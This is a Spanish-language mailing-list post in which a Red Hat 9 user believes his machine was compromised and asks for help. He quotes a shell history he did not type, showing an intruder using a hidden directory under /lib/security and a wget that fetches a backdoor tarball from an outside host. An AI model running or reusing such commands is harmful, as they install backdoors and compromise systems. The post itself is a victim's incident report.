Fui atacado]

Hola lista, un saludo para todos. Sé que esto es una lista de debian pero
quisiera también ayuda de uds. Les cuento.

Creo que fui victima de un ataque y quisiera saber como
lo hiceron para proteger mi maquina aun màs, además el ataque fue como
de advertencia porque ya me habria destruido todo. Y creo que me
capturaron un password y montaron un shell paralelo, esa es mi
apreciacion y uds me diran si es asi.

Estaba trabajando en mi maquina(con redhat9) y de repente vi algo raro en
los archivo que estan en /etc. entonce me fui a /var/log/messages y no
encontre nada raro, excepto que me parecio raro que no tenia registrado
nada de fecha 18 de febrero en el syslog. Luego hice un history y me
aparecio esto que por su puesto yo no lo hice(màs raro aun):

 484  cat /etc/issue
  485  ps
  486  bash
  487  /usr/sbin:/sbin:/usr/bin:/bin:/lib/security/.config/bin
  488  netstat -a
  489  cd /lib/security/.config/bin
  490  cd /lib/security/.config
  491  dir
  492  cd ssh
  493  dir
  494  cd ..
  495  wget http://www.gwydiondylan.org/downloads/binaries/linux/x86 496
 /tar/gwydion-dylan-2.3.10-x86-linux.tar.gz
  497  wget
http://www.gwydiondylan.org/downloads/binaries/linux/x86/tar/gwydion-dylan-2.3.10-x86-linux.tar.gz
  498  wget geocities.com/s3rjiu/backdoor/ser.tar.gz

Esto paquete porsuesto no los baje.

Ah hago un ps y no sale nada, me dice esto:
Violación de segmento

Cual es la inseguridad que tengo?

Gracias y saludos......

--